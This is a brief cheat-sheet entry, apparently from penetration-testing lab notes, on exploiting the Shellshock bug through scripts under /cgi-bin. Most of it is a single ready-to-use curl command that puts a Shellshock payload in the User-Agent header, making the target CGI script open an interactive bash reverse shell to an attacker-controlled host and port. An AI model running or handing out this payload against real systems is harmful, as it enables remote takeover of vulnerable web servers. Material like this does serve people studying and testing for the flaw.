Usually exploitable when cgi scripts are available under /cgi-bin
Reverse shell via curl :
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.119.122/443 0>&1' <http://10.11.1.71/cgi-bin/admin.cgi>